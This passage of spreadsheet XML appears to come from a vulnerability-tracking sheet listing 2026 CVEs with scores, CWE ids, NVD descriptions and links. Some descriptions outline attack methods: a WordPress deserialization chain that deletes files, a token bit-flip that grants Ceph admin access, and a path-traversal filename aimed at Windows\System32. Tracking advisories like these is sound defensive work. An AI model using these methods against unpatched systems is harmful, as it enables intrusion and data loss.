      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr">
        <is>
          <t>The Welcart e-Commerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.1 via deserialization of untrusted input in the Telecom EDY payment callback (usces_action_acting_transaction). Unauthenticated attackers can store arbitrary 'reserve' key/value pairs as order metadata during a public checkout, then invoke the callback with an attacker-chosen 'option' parameter to select and unserialize that metadata without any provider signature, source-address, transaction-identity or ownership check. A POP chain is present in the TCPDF library bundled with the plugin itself, so no additional plugin or theme is required. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, including wp-config.php, which can lead to remote code execution when an attacker re-runs the WordPress installer against a database they control. Successful exploitation is contingent on an admin printing an invoice to trigger file deletion.</t>
        </is>
      </c>
      <c r="M760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19887</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21092</t>
        </is>
      </c>
      <c r="C761" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E761" s="5" t="inlineStr"/>
      <c r="F761" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="inlineStr"/>
      <c r="I761" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr">
        <is>
          <t>Path traversal in ImsService prior to SMR Sep-2026 Release 1 allows remote attackers to create image files with system server privilege.</t>
        </is>
      </c>
      <c r="M761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21092</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27140</t>
        </is>
      </c>
      <c r="C762" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E762" s="5" t="inlineStr"/>
      <c r="F762" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I762" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>CWE-641, CWE-863</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr">
        <is>
          <t>SWIG file names containing 'cgo' and well-crafted payloads could lead to code smuggling and arbitrary code execution at build time due to trust layer bypass.</t>
        </is>
      </c>
      <c r="M762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27140</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27606</t>
        </is>
      </c>
      <c r="C763" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E763" s="5" t="inlineStr"/>
      <c r="F763" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G763" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H763" s="5" t="inlineStr">
        <is>
          <t>rollupjs:rollup</t>
        </is>
      </c>
      <c r="I763" s="5" t="inlineStr">
        <is>
          <t>2026-02-25</t>
        </is>
      </c>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L763" s="5" t="inlineStr">
        <is>
          <t>Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.</t>
        </is>
      </c>
      <c r="M763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27606</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28609</t>
        </is>
      </c>
      <c r="C764" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E764" s="5" t="inlineStr"/>
      <c r="F764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L764" s="5" t="inlineStr">
        <is>
          <t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28618</t>
        </is>
      </c>
      <c r="C765" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E765" s="5" t="inlineStr"/>
      <c r="F765" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L765" s="5" t="inlineStr">
        <is>
          <t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28666</t>
        </is>
      </c>
      <c r="C766" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E766" s="5" t="inlineStr"/>
      <c r="F766" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G766" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L766" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of LocalImageResolver.java, there is a possible Remote Persistent Denial of Service due to a DNG image rendering check bypass. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30754</t>
        </is>
      </c>
      <c r="C767" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E767" s="5" t="inlineStr"/>
      <c r="F767" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L767" s="5" t="inlineStr">
        <is>
          <t>A memory corruption vulnerability exists in FFmpeg before 8.1. The RTP encoding process. In the nal_send function in libavformat/rtpenc_h264_hevc.c, a negative size parameter (size=-3) is passed to memcpy when transmitting H.264/HEVC streams via RTP using a crafted input file. This was detected using AddressSanitizer.</t>
        </is>
      </c>
      <c r="M767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31936</t>
        </is>
      </c>
      <c r="C768" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E768" s="5" t="inlineStr"/>
      <c r="F768" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L768" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, users can access to unauthorized object information through the search operation. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31936</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32590</t>
        </is>
      </c>
      <c r="C769" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E769" s="5" t="inlineStr"/>
      <c r="F769" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G769" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H769" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I769" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L769" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.</t>
        </is>
      </c>
      <c r="M769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32590</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33001</t>
        </is>
      </c>
      <c r="C770" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E770" s="5" t="inlineStr"/>
      <c r="F770" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G770" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H770" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I770" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L770" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.554 and earlier, LTS 2.541.2 and earlier does not safely handle symbolic links during the extraction of .tar and .tar.gz archives, allowing crafted archives to write files to arbitrary locations on the filesystem, restricted only by file system access permissions of the user running Jenkins.
This can be exploited to deploy malicious scripts or plugins on the controller by attackers with Item/Configure permission, or able to control agent processes.</t>
        </is>
      </c>
      <c r="M770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33001</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33240</t>
        </is>
      </c>
      <c r="C771" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E771" s="5" t="inlineStr"/>
      <c r="F771" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L771" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there was a Reflected Cross-Site Scripting (XSS) vulnerability in the foreign key search criteria API. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33240</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39944</t>
        </is>
      </c>
      <c r="C772" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E772" s="5" t="inlineStr"/>
      <c r="F772" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G772" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L772" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the RADOS Gateway (RGW) protects STS session tokens with an AES-128-CBC handler that provides no message authentication, allowing an attacker who holds any valid STS token to tamper with it undetected and escalate to full RGW administrative access. Because the ciphertext is unauthenticated, the attacker can perform a CBC bit-flip on the acct_type, perm_type, and is_admin fields of their own token, and a forged is_admin value triggers a global administrative override that bypasses all capability checks. The attack is reachable remotely over the RGW S3 endpoint and is a self-contained modification of a token the attacker already possesses, requiring no encryption oracle and no network observation. It requires only a single valid STS token, which need not carry any elevated privileges, with STS enabled. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39944</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40858</t>
        </is>
      </c>
      <c r="C773" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E773" s="5" t="inlineStr"/>
      <c r="F773" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G773" s="5" t="inlineStr">
        <is>
          <t>java, apache, jira</t>
        </is>
      </c>
      <c r="H773" s="5" t="inlineStr">
        <is>
          <t>apache:camel</t>
        </is>
      </c>
      <c r="I773" s="5" t="inlineStr">
        <is>
          <t>2026-04-27</t>
        </is>
      </c>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr">
        <is>
          <t>The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application.
This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.
Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.
The JIRA ticket:  https://issues.apache.org/jira/browse/CAMEL-23322  refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.</t>
        </is>
      </c>
      <c r="M773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40858</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41870</t>
        </is>
      </c>
      <c r="C774" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E774" s="5" t="inlineStr"/>
      <c r="F774" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G774" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862, CWE-913, CWE-94</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Control of Generation of Code ('Code Injection'), Improper Control of Dynamically-Managed Code Resources, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Nutch Server  (Nutch REST API).
This issue affects Apache Nutch: from 1.11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774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41870</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="C775" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E775" s="5" t="inlineStr"/>
      <c r="F775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="I775" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L775" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory (Self Hosted) versions before 7.133.11 are vulnerable to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="M775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43112</t>
        </is>
      </c>
      <c r="C776" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E776" s="5" t="inlineStr"/>
      <c r="F776" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G776" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H776" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I776" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L776" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/smb/client: fix out-of-bounds read in cifs_sanitize_prepath
When cifs_sanitize_prepath is called with an empty string or a string
containing only delimiters (e.g., "/"), the current logic attempts to
check *(cursor2 - 1) before cursor2 has advanced. This results in an
out-of-bounds read.
This patch adds an early exit check after stripping prepended
delimiters. If no path content remains, the function returns NULL.
The bug was identified via manual audit and verified using a
standalone test case compiled with AddressSanitizer, which
triggered a SEGV on affected inputs.</t>
        </is>
      </c>
      <c r="M776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43112</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44829</t>
        </is>
      </c>
      <c r="C777" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E777" s="5" t="inlineStr"/>
      <c r="F777" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G777" s="5" t="inlineStr">
        <is>
          <t>windows, docker</t>
        </is>
      </c>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L777" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. In 8.32.0 and earlier, filename handling in pkg/modules/api/context.go uses filepath.Base on Linux, which does not treat backslashes as path separators, so a multipart filename containing Windows-style parent directory components survives sanitization. The original filename flows through ctx.diskToOriginal and the multi-output PDF routes into archives.FilesFromDisk and archives.Zip.Archive as the generated zip entry name. A remote attacker can submit a name such as ........\Windows\System32\evil.pdf through an upload or an upstream downloadFrom Content-Disposition header, and a Windows archive extractor can write the resulting file outside the intended extraction directory. The affected paths include /forms/pdfengines/split and other multi-output PDF, LibreOffice, and conversion routes, and exploitation can cause arbitrary file writes on a downstream Windows system when a user or process extracts the returned archive. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44829</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4601</t>
        </is>
      </c>
      <c r="C778" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E778" s="5" t="inlineStr"/>
      <c r="F778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I778" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr">
        <is>
          <t>CWE-325</t>
        </is>
      </c>
      <c r="L778" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Missing Cryptographic Step via the KJUR.crypto.DSA.signWithMessageHash process in the DSA signing implementation. An attacker can recover the private key by forcing r or s to be zero, so the library emits an invalid signature without retrying, and then solves for x from the resulting signature.</t>
        </is>
      </c>
      <c r="M778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4601</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48050</t>
        </is>
      </c>
      <c r="C779" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E779" s="5" t="inlineStr"/>
      <c r="F779" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="L779" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Versions prior to 26.06.1 register Go's `net/http/pprof` handlers at `/debug/pprof/*` via `app.Use(pprof.New())` in `internal/api/server.go`, and `/debug/pprof` is added to `PublicPrefixes` in `cmd/arc/main.go`. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication. Version 26.06.1 contains a patch. Some workarounds are available. Block `/debug/pprof*` at a reverse proxy / load balancer in front of Arc, restrict Arc's API port to known-trusted networks via firewall rules, and/or patch the running build: comment out `app.Use(pprof.New())` in `internal/api/server.go` and rebuild.</t>
        </is>
      </c>
      <c r="M779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48050</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48054</t>
        </is>
      </c>
      <c r="C780" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E780" s="5" t="inlineStr"/>
      <c r="F780" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G780" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L780" s="5" t="inlineStr">
        <is>
